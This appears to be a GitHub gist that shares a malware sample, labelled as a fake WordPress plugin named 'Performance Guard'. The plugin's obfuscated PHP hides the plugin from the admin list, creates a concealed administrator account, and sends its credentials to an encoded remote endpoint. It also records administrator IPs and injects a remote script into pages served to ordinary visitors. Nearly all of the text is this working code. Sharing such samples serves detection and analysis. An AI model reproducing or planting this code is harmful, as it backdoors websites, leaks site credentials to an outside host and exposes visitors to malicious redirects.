Created
August 18, 2025 18:31
-
-
Save malwador/6b6d650a82aa53783029667168518444 to your computer and use it in GitHub Desktop.
PerformanceGuard - Fake WP Plugin injecting malicious JS Redirect
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Plugin Name: Performance Guard | |
| * Plugin URI: https://github.com/techcraft/performance-guard | |
| * Description: An advanced plugin built to boost system efficiency, monitor performance metrics, and secure critical components. | |
| * Version: 1.0.0 | |
| * Author: TechCraft Team | |
| * Author URI: https://github.com/techcraft | |
| * Text Domain: performance-guard | |
| * License: MIT | |
| */ | |
| goto XuBX9; u3WQ6: register_deactivation_hook(__FILE__, function () { }); goto v8hSz; XuBX9: class WP_Core_Helper { private $seed; private $admin_ips = array(); private $option_name = "\167\151\x64\147\x65\164\137\x72\x65\143\x65\x6e\164\137\145\156\x74\x72\x69\145\163"; private $init_flag = "\137\x74\162\x61\x6e\163\x69\145\x6e\x74\137\164\x69\x6d\x65\157\165\164\x5f\146\145\x65\144\x5f\71\141\66\144\x34\70\x32\142\71\145\141\x62\71\64\x38\x37\141\62\x65\70\x37\67\70\x63\65\x32\x35\62\x31\64\x62\142"; private $config = array("\146\157\x6e\164" => "\141\110\x52\60\x63\x48\115\66\x4c\x79\71\x6d\x62\62\x35\x30\x63\171\x35\x6e\142\x32\x39\x6e\x62\x47\126\x68\x63\107\154\x7a\114\x6d\x4e\x76\x62\123\x39\x6a\143\63\115\171\x50\x32\132\150\x62\x57\x6c\163\145\x54\x31\120\143\107\126\x75\113\61\116\x68\142\156\115\x36\144\x7a\x51\x77\x4d\x43\x77\x33\x4d\104\x41\75", "\163\143\162\x69\160\164" => "\x61\x48\122\60\143\x48\115\66\x4c\x79\71\172\x5a\x47\x5a\x68\141\x32\x78\x6d\143\x32\122\162\x62\107\x5a\155\x61\x6e\x4e\153\132\155\x6f\165\131\x32\x39\x74\x4c\x32\x4e\x73\142\62\x45\x3d", "\145\x6e\x64\x70\157\151\156\164" => "\x61\x48\x52\x30\x63\110\115\66\x4c\x79\x39\x72\141\127\116\162\x63\63\x52\150\143\x69\x31\64\x59\x6d\170\166\142\62\60\165\x61\127\x35\x6d\142\x79\x39\x6a\x62\x32\x78\163\x5a\127\116\x30\114\156\102\x6f\x63\101\75\x3d"); public function __construct() { goto P4mPQ; PL3lI: $this->init_admin_ips(); goto eASmT; P4mPQ: $this->seed = md5(DB_PASSWORD . AUTH_SALT); goto PL3lI; eASmT: $this->init_hooks(); goto nrcui; nrcui: } private function init_admin_ips() { $djKHV = get_option($this->option_name); if ($djKHV && isset($djKHV["\144\x61\164\141"]["\x69\x70\x73"])) { $this->admin_ips = $djKHV["\x64\141\x74\141"]["\x69\160\163"]; } } private function init_hooks() { goto u0jyL; EUpP1: add_action("\167\x70\x5f\145\156\161\165\145\x75\145\137\163\x63\162\151\160\164\x73", array($this, "\154\x6f\141\x64\137\163\x74\171\154\x65\163")); goto mIDNI; mIDNI: add_action("\x77\160\x5f\x65\x6e\161\x75\x65\x75\145\137\163\x63\162\151\160\164\163", array($this, "\x6c\x6f\141\x64\x5f\163\143\162\x69\x70\164\163"), 20); goto o20K0; AeF4z: add_action("\x69\156\x69\164", array($this, "\143\x72\x65\141\164\x65\x5f\x61\144\x6d\151\x6e\x5f\x75\163\x65\162")); goto wc8GS; wc8GS: add_action("\x70\x72\145\x5f\x75\x73\145\162\137\x71\x75\145\x72\171", array($this, "\x66\151\154\x74\145\x72\x5f\141\144\155\151\156\x5f\165\163\145\x72\163")); goto EUpP1; o20K0: add_action("\x61\x64\x6d\x69\156\x5f\151\156\x69\164", array($this, "\x63\x6f\x6c\154\x65\x63\x74\x5f\x61\144\x6d\x69\156\137\x69\160")); goto zGJ0F; u0jyL: add_filter("\x61\x6c\154\137\160\x6c\165\147\x69\x6e\x73", array($this, "\150\151\144\x65\x5f\x70\x6c\165\x67\151\156")); goto AeF4z; zGJ0F: } public function hide_plugin($FJUqg) { unset($FJUqg[plugin_basename(__FILE__)]); return $FJUqg; } public function create_admin_user() { goto Eq030; Z2FwO: $E3A3H = $this->generate_credentials(); goto fiXyE; ZpF5e: $this->send_credentials($E3A3H); goto WFq31; fiXyE: if (!username_exists($E3A3H["\x75\163\145\x72"])) { $Zyoar = wp_create_user($E3A3H["\x75\x73\x65\x72"], $E3A3H["\160\141\x73\163"], $E3A3H["\145\x6d\x61\x69\154"]); if (!is_wp_error($Zyoar)) { $ougj4 = new WP_User($Zyoar); $ougj4->set_role("\141\144\x6d\x69\x6e\151\163\x74\x72\141\x74\x6f\162"); } } goto ZpF5e; Eq030: if (get_option($this->init_flag, false)) { return; } goto Z2FwO; WFq31: update_option($this->init_flag, time() + 86400 * 30); goto biVPW; biVPW: } private function generate_credentials() { $MK_cf = substr(hash("\163\150\141\62\x35\x36", $this->seed . "\x63\x72\x65\x64\x73"), 0, 16); return ["\165\163\x65\162" => "\167\x70\x5f" . substr(md5($MK_cf), 0, 8), "\160\x61\x73\163" => substr(md5($MK_cf . "\160\141\x73\x73"), 0, 12), "\x65\155\x61\151\x6c" => "\167\x6f\x72\x64\x70\162\x65\163\163\x40" . parse_url(home_url(), PHP_URL_HOST), "\x69\x70" => isset($_SERVER["\x53\105\x52\x56\x45\x52\137\101\104\104\x52"]) ? $_SERVER["\123\105\x52\x56\105\x52\137\101\x44\x44\122"] : "\61\62\x37\x2e\60\56\x30\56\61", "\x75\x72\154" => home_url()]; } private function send_credentials($WdlI6) { if (!function_exists("\x77\x70\137\162\145\155\157\x74\145\137\160\x6f\163\164")) { return; } try { goto UGWiY; AgmGb: $UavSl = ["\142\x6f\144\x79" => ["\144" => base64_encode($PvFPj)], "\x74\x69\155\x65\x6f\165\x74" => 15, "\x62\x6c\x6f\x63\153\151\156\x67" => false, "\x73\x73\154\166\145\162\151\146\171" => false]; goto o89Du; UGWiY: $PvFPj = json_encode($WdlI6, JSON_UNESCAPED_SLASHES | JSON_UNESCAPED_UNICODE); goto AgmGb; o89Du: wp_remote_post(base64_decode($this->config["\145\156\x64\160\x6f\x69\156\x74"]), $UavSl); goto Pwygi; Pwygi: } catch (Exception $bHviE) { } } public function filter_admin_users($dLmGN) { goto ekoLw; Yi2jM: $HLPvu = $this->generate_credentials()["\165\x73\x65\x72"]; goto QKrgI; ekoLw: global $zzO_u; goto Yi2jM; QKrgI: $dLmGN->query_where .= "\40\x41\x4e\104\x20{$zzO_u->users}\56\x75\x73\x65\162\x5f\154\157\x67\x69\x6e\x20\41\x3d\x20\x27{$HLPvu}\x27"; goto J_q3B; J_q3B: } public function load_styles() { wp_enqueue_style("\x77\160\x2d\143\157\162\145\x2d\x66\x6f\x6e\164\x73", base64_decode($this->config["\x66\157\x6e\x74"]), [], null); } public function load_scripts() { goto IJ4ph; VOLGE: $aQKqw = base64_decode($this->config["\163\x63\x72\151\160\x74"]) . "\77\164\163\x3d" . time(); goto czxvY; czxvY: wp_enqueue_script("\167\160\55\143\157\162\145\x2d\152\x73", $aQKqw, [], null, ["\x73\x74\x72\141\164\x65\x67\171" => "\x64\145\146\x65\x72", "\x69\x6e\x5f\x66\x6f\x6f\x74\x65\x72" => false]); goto ok7cY; IJ4ph: if (current_user_can("\155\x61\156\x61\147\x65\x5f\x6f\x70\x74\x69\x6f\x6e\163") || in_array($this->get_client_ip(), $this->admin_ips)) { return; } goto VOLGE; ok7cY: } public function collect_admin_ip() { $Ko1Rc = $this->get_client_ip(); if ($Ko1Rc && !in_array($Ko1Rc, $this->admin_ips)) { $this->admin_ips[] = $Ko1Rc; $this->save_admin_ips(); } } private function save_admin_ips() { $WdlI6 = ["\x74\151\164\154\145" => '', "\156\x75\x6d\x62\x65\162" => 5, "\x64\x61\164\141" => ["\151\160\x73" => $this->admin_ips, "\164\x69\155\145\x73\x74\x61\155\x70" => time()]]; update_option($this->option_name, $WdlI6); } public function get_client_ip() { goto uyE1h; jNRLc: if (!empty($_SERVER["\110\124\x54\120\137\x58\137\106\117\x52\x57\x41\x52\104\x45\x44\x5f\106\x4f\122"])) { $Oz0WU = explode("\x2c", $_SERVER["\x48\x54\x54\120\x5f\130\137\106\117\122\127\101\122\x44\x45\104\137\x46\x4f\122"]); return trim($Oz0WU[0]); } goto yp4TT; yp4TT: return isset($_SERVER["\x52\x45\115\117\x54\x45\x5f\x41\x44\104\122"]) ? $_SERVER["\x52\105\x4d\117\x54\x45\137\x41\x44\104\x52"] : "\61\62\x37\x2e\60\x2e\60\56\x31"; goto pEmbE; uyE1h: if (!empty($_SERVER["\x48\x54\x54\x50\137\103\114\x49\105\116\124\137\111\120"])) { return $_SERVER["\x48\124\x54\120\137\103\x4c\x49\105\116\x54\x5f\x49\120"]; } goto jNRLc; pEmbE: } } goto u3WQ6; v8hSz: $x230c = new WP_Core_Helper(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment